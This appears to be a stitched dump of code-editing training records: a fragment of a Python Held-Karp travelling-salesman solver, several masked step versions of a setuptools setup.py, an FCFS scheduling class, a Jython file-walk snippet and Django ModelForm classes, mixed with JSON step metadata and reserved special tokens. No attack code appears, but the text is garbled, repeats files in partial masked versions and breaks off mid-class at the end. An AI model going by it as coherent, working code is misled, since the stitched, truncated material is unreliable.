dp[i][(1<<n)-1] = d[i][0]\n\n # Fill in all values of the dp table, excluding the values from the\n # base case we've already inserted\n # Note we started with having visited all cities except for 0\n # and work backwards from there\n for visited in reversed(xrange((1<<n)-1)):\n for i in xrange(n):\n min_dist = sys.maxint\n for j in xrange(n):\n if not (1 << j) & visited:\n dist_j = d[i][j] + dp[j][visited | (1 << j)]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n\n ans = dp[0][1]\n\n # We can also optain the optimal path working backwards using\n # the table and the knowledge of the cost of the optimal path\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n)-1:\n for j in xrange(n):\n if not visited & (1 << j):\n cost_from_j = dp[j][visited | (1 << j)]\n # require a tolerance for real valued distances\n if abs((cost_from_i - cost_from_j) - d[i][j]) < 0.001:\n # j was the city selected in the opt solution\n path.append(j)\n i, visited = j, visited | (1 << j)\n cost_from_i = cost_from_j\n break\n # We have visited all cities, so return to 0\n path.append(0)\n\n return ans, path\n\n\nclass Vertex:\n ''' Simple implementation of a point in Euclidean space '''\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n ''' Euclidean distance between two `Vertex` instances '''\n return ((v1.x - v2.x)**2 + (v1.y - v2.y)**2)**0.5\n\n\ndef adjacency_matrix(graph):\n '''\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n '''\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\ndef main():\n\n ## Test cases\n\n # g1: (16.0, [0, 2, 1, 3, 0])\n g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]\n m1 = adjacency_matrix(g1)\n for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:\n cost, path = solver(m1)\n assert cost == 16.0\n assert path == [0, 2, 1, 3, 0]\n\n # g2: (15.773387165490545, [0, 3, 1, 2, 4, 0])\n g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]\n m2 = adjacency_matrix(g2)\n for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:\n cost, path = solver(m2)\n assert abs(cost - 15.7733871) < 0.001\n assert path == [0, 3, 1, 2, 4, 0]\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
5,
8,
9,
10,
12
]
}
|
[
5,
8,
9,
10,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='dragonfab', version='1.3.0', description='Fabric support',
author='Joel Pitt', author_email='joel@joelpitt.com', url=
'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',
'pip>=1.4', 'wheel'], packages=['dragonfab'])
<|reserved_special_token_1|>
from setuptools import setup
setup(name='dragonfab', version='1.3.0', description='Fabric support',
author='Joel Pitt', author_email='joel@joelpitt.com', url=
'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',
'pip>=1.4', 'wheel'], packages=['dragonfab'])
<|reserved_special_token_1|>
from setuptools import setup
setup(name = "dragonfab",
version = "1.3.0",
description = "Fabric support",
author = "Joel Pitt",
author_email = "joel@joelpitt.com",
url = "https://github.com/ferrouswheel/dragonfab",
install_requires = ['fabric', 'pip>=1.4', 'wheel'],
packages = ['dragonfab'],
)
|
flexible
|
{
"blob_id": "61135a10adefd6ba8ffd63e997fa91ce9c78de06",
"index": 6444,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='dragonfab', version='1.3.0', description='Fabric support',\n author='Joel Pitt', author_email='joel@joelpitt.com', url=\n 'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',\n 'pip>=1.4', 'wheel'], packages=['dragonfab'])\n",
"step-3": "from setuptools import setup\nsetup(name='dragonfab', version='1.3.0', description='Fabric support',\n author='Joel Pitt', author_email='joel@joelpitt.com', url=\n 'https://github.com/ferrouswheel/dragonfab', install_requires=['fabric',\n 'pip>=1.4', 'wheel'], packages=['dragonfab'])\n",
"step-4": "from setuptools import setup\n\nsetup(name = \"dragonfab\",\n version = \"1.3.0\",\n description = \"Fabric support\",\n author = \"Joel Pitt\",\n author_email = \"joel@joelpitt.com\",\n url = \"https://github.com/ferrouswheel/dragonfab\",\n install_requires = ['fabric', 'pip>=1.4', 'wheel'],\n packages = ['dragonfab'],\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import Individual
import Grupal
import matplotlib.pyplot as plt
import pandas as pd
plt.show()
|
normal
|
{
"blob_id": "bb1caf4d04c8a42279afa0ac586ced991e0dff84",
"index": 4574,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.show()\n",
"step-3": "import Individual\nimport Grupal\nimport matplotlib.pyplot as plt\nimport pandas as pd\nplt.show()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class Process:
def __init__(self, id, at, bt):
self.id = id
self.at = at
self.bt = bt
self.wt = 0
self.ct = 0
self.st = 0
self.tat = 0
def fill(self, st):
print('Current process:', self.id)
self.st = st
self.ct = self.st + self.bt
self.tat = self.ct - self.at
self.wt = self.tat - self.bt
return self.ct
def print(self):
st = '\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.tat, self.wt]))
print(st)
@classmethod
def display(cls, process_list):
print('ID\tAT\tBT\tCT\tTAT\tWT')
for process in process_list:
process.print()
print('----------------------')
if __name__ == '__main__':
# n = int(input("Enter the number of processes: "))
# print("Enter the process and their details in the format ID AT BT")
l = [
[1, 5, 0],
[2, 3, 1],
[3, 8, 2],
[4, 6, 3],
]
n = len(l)
processes = []
for p in l:
processes.append(Process(*p))
# for i in range(n):
# processes.append(Process(random.randint(0, 10), random.randint(0, 10), random.randint(0, 10)))
# processes.append(Process(*[int(x.strip()) for x in input().split(' ')]))
Process.display(processes)
print('Sorting.')
processes.sort(key=lambda x: x.at)
Process.display(processes)
t = processes[0].at
for process in processes:
t = process.fill(max(t, process.at))
Process.display(processes)
Process.display(processes)
|
normal
|
{
"blob_id": "be58a2e0dcdbcb3a3df0da87be29ce7ebcee7fe9",
"index": 6185,
"step-1": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n <mask token>\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.\n tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\n<mask token>\n",
"step-3": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n\n def fill(self, st):\n print('Current process:', self.id)\n self.st = st\n self.ct = self.st + self.bt\n self.tat = self.ct - self.at\n self.wt = self.tat - self.bt\n return self.ct\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.\n tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\n<mask token>\n",
"step-4": "class Process:\n\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n\n def fill(self, st):\n print('Current process:', self.id)\n self.st = st\n self.ct = self.st + self.bt\n self.tat = self.ct - self.at\n self.wt = self.tat - self.bt\n return self.ct\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.\n tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\nif __name__ == '__main__':\n l = [[1, 5, 0], [2, 3, 1], [3, 8, 2], [4, 6, 3]]\n n = len(l)\n processes = []\n for p in l:\n processes.append(Process(*p))\n Process.display(processes)\n print('Sorting.')\n processes.sort(key=lambda x: x.at)\n Process.display(processes)\n t = processes[0].at\n for process in processes:\n t = process.fill(max(t, process.at))\n Process.display(processes)\n Process.display(processes)\n",
"step-5": "class Process:\n def __init__(self, id, at, bt):\n self.id = id\n self.at = at\n self.bt = bt\n self.wt = 0\n self.ct = 0\n self.st = 0\n self.tat = 0\n\n def fill(self, st):\n print('Current process:', self.id)\n self.st = st\n self.ct = self.st + self.bt\n self.tat = self.ct - self.at\n self.wt = self.tat - self.bt\n return self.ct\n\n def print(self):\n st = '\\t'.join(map(str, [self.id, self.at, self.bt, self.ct, self.tat, self.wt]))\n print(st)\n\n @classmethod\n def display(cls, process_list):\n print('ID\\tAT\\tBT\\tCT\\tTAT\\tWT')\n for process in process_list:\n process.print()\n print('----------------------')\n\n\nif __name__ == '__main__':\n # n = int(input(\"Enter the number of processes: \"))\n # print(\"Enter the process and their details in the format ID AT BT\")\n l = [\n [1, 5, 0],\n [2, 3, 1],\n [3, 8, 2],\n [4, 6, 3],\n ]\n n = len(l)\n processes = []\n\n for p in l:\n processes.append(Process(*p))\n # for i in range(n):\n # processes.append(Process(random.randint(0, 10), random.randint(0, 10), random.randint(0, 10)))\n # processes.append(Process(*[int(x.strip()) for x in input().split(' ')]))\n Process.display(processes)\n print('Sorting.')\n processes.sort(key=lambda x: x.at)\n Process.display(processes)\n\n t = processes[0].at\n for process in processes:\n t = process.fill(max(t, process.at))\n Process.display(processes)\n\n Process.display(processes)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# Jython/Walk_comprehension.py
import os
restFiles = [os.path.join(d[0], f) for d in os.walk(".")
for f in d[2] if f.endswith(".java") and
"PythonInterpreter" in open(os.path.join(d[0], f)).read()]
for r in restFiles:
print(r)
|
normal
|
{
"blob_id": "61085eecc8fd0b70bc11e5a85c3958ba3b905eaf",
"index": 3118,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor r in restFiles:\n print(r)\n",
"step-3": "<mask token>\nrestFiles = [os.path.join(d[0], f) for d in os.walk('.') for f in d[2] if f\n .endswith('.java') and 'PythonInterpreter' in open(os.path.join(d[0], f\n )).read()]\nfor r in restFiles:\n print(r)\n",
"step-4": "import os\nrestFiles = [os.path.join(d[0], f) for d in os.walk('.') for f in d[2] if f\n .endswith('.java') and 'PythonInterpreter' in open(os.path.join(d[0], f\n )).read()]\nfor r in restFiles:\n print(r)\n",
"step-5": "# Jython/Walk_comprehension.py\nimport os\nrestFiles = [os.path.join(d[0], f) for d in os.walk(\".\")\n for f in d[2] if f.endswith(\".java\") and \n \"PythonInterpreter\" in open(os.path.join(d[0], f)).read()]\nfor r in restFiles:\n print(r)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TblBlogForm(forms.ModelForm):
class Meta:
model = TblBlog
fields = ['blog_title', 'blog_description', 'blog_keyword',
'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
'blog_summary', 'blog_like', 'blog_added_by']
<|reserved_special_token_0|>
class TblBlogCommentsForm(forms.ModelForm):
class Meta:
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta:
model = TblLearnData
fields = ['learn_data', 'learn_data_keyword',
'learn_data_description', 'learn_data_publish',
'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
'learn_data_like', 'learn_data_icon']
def __init__(self, *args, **kwargs):
super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['learn_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['learn_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta:
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta:
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta:
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta:
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
self.fields['home_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
class Meta:
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
self.fields['about_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
class Meta:
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['learn_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['learn_topics_publish'].label = 'Publish'
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta:
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
)
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['snippet_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['snippet_topics_publish'].label = 'Publish'
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta:
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = 'Name'
self.fields['email'].widget.attrs['placeholder'] = 'Email'
self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TblBlogForm(forms.ModelForm):
class Meta:
model = TblBlog
fields = ['blog_title', 'blog_description', 'blog_keyword',
'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
'blog_summary', 'blog_like', 'blog_added_by']
def __init__(self, *args, **kwargs):
super(TblBlogForm, self).__init__(*args, **kwargs)
self.fields['blog_datetime'].widget = forms.HiddenInput()
self.fields['blog_summary'].widget = forms.HiddenInput()
self.fields['blog_like'].widget = forms.HiddenInput()
self.fields['blog_added_by'].widget = forms.HiddenInput()
self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['blog_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['blog_content'].widget.attrs['placeholder'
] = 'Blog Content'
self.fields['blog_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'
self.fields['blog_publish'].label = 'Publish'
class TblBlogCommentsForm(forms.ModelForm):
class Meta:
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta:
model = TblLearnData
fields = ['learn_data', 'learn_data_keyword',
'learn_data_description', 'learn_data_publish',
'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
'learn_data_like', 'learn_data_icon']
def __init__(self, *args, **kwargs):
super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['learn_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['learn_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta:
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta:
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta:
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta:
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
self.fields['home_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
class Meta:
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
self.fields['about_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
class Meta:
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['learn_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['learn_topics_publish'].label = 'Publish'
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta:
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
)
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['snippet_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['snippet_topics_publish'].label = 'Publish'
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta:
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = 'Name'
self.fields['email'].widget.attrs['placeholder'] = 'Email'
self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TblSnippetDataForm(forms.ModelForm):
class Meta:
model = TblSnippetData
fields = ['snippet_topics', 'snippet_data_subject',
'snippet_data_description', 'snippet_data_keyword',
'snippet_data_code', 'snippet_data_datetime',
'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
def __init__(self, *args, **kwargs):
super(TblSnippetDataForm, self).__init__(*args, **kwargs)
self.fields['snippet_data_datetime'].widget = forms.HiddenInput()
self.fields['snippet_data_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget = forms.HiddenInput()
self.fields['snippet_data_subject'].widget.attrs['placeholder'
] = 'Title/Topics'
self.fields['snippet_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['snippet_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['snippet_data_code'].widget.attrs['placeholder'
] = 'Snippet (Code)'
self.fields['snippet_data_publish'].widget.attrs['placeholder'
] = 'Ready-To-Publish'
self.fields['snippet_data_publish'].label = 'Publish'
class TblBlogForm(forms.ModelForm):
class Meta:
model = TblBlog
fields = ['blog_title', 'blog_description', 'blog_keyword',
'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
'blog_summary', 'blog_like', 'blog_added_by']
def __init__(self, *args, **kwargs):
super(TblBlogForm, self).__init__(*args, **kwargs)
self.fields['blog_datetime'].widget = forms.HiddenInput()
self.fields['blog_summary'].widget = forms.HiddenInput()
self.fields['blog_like'].widget = forms.HiddenInput()
self.fields['blog_added_by'].widget = forms.HiddenInput()
self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['blog_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['blog_content'].widget.attrs['placeholder'
] = 'Blog Content'
self.fields['blog_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'
self.fields['blog_publish'].label = 'Publish'
class TblBlogCommentsForm(forms.ModelForm):
class Meta:
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta:
model = TblLearnData
fields = ['learn_data', 'learn_data_keyword',
'learn_data_description', 'learn_data_publish',
'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
'learn_data_like', 'learn_data_icon']
def __init__(self, *args, **kwargs):
super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['learn_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['learn_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta:
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta:
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta:
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta:
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
self.fields['home_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
class Meta:
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
self.fields['about_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
class Meta:
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['learn_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['learn_topics_publish'].label = 'Publish'
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta:
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
)
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['snippet_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['snippet_topics_publish'].label = 'Publish'
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta:
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = 'Name'
self.fields['email'].widget.attrs['placeholder'] = 'Email'
self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SignupForm(UserCreationForm):
<|reserved_special_token_0|>
class Meta:
model = User
fields = 'username', 'email', 'password1', 'password2'
<|reserved_special_token_0|>
class UserRegistrationForm(forms.Form):
username = forms.CharField(required=True, min_length=6, label=
'Username', max_length=100, widget=forms.TextInput(attrs={
'placeholder': 'Username'}))
email = forms.EmailField(required=True, label='Email', max_length=100,
widget=forms.EmailInput(attrs={'placeholder':
'e.g. : email@gmail.com'}))
firstname = forms.CharField(required=True, label='First Name',
max_length=100, widget=forms.TextInput(attrs={'placeholder':
'First Name'}))
lastname = forms.CharField(required=True, label='Last Name', max_length
=100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))
password = forms.CharField(required=True, label='Password', max_length=
100, widget=forms.PasswordInput(attrs={'placeholder': 'Password'}))
passwordagain = forms.CharField(required=True, label='Password (Again)',
max_length=100, widget=forms.PasswordInput(attrs={'placeholder':
'Password (Again)'}))
class TblPublishForm(forms.ModelForm):
class Meta:
model = TblPublish
fields = '__all__'
class TblSnippetDataForm(forms.ModelForm):
class Meta:
model = TblSnippetData
fields = ['snippet_topics', 'snippet_data_subject',
'snippet_data_description', 'snippet_data_keyword',
'snippet_data_code', 'snippet_data_datetime',
'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
def __init__(self, *args, **kwargs):
super(TblSnippetDataForm, self).__init__(*args, **kwargs)
self.fields['snippet_data_datetime'].widget = forms.HiddenInput()
self.fields['snippet_data_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget = forms.HiddenInput()
self.fields['snippet_data_subject'].widget.attrs['placeholder'
] = 'Title/Topics'
self.fields['snippet_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['snippet_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['snippet_data_code'].widget.attrs['placeholder'
] = 'Snippet (Code)'
self.fields['snippet_data_publish'].widget.attrs['placeholder'
] = 'Ready-To-Publish'
self.fields['snippet_data_publish'].label = 'Publish'
class TblBlogForm(forms.ModelForm):
class Meta:
model = TblBlog
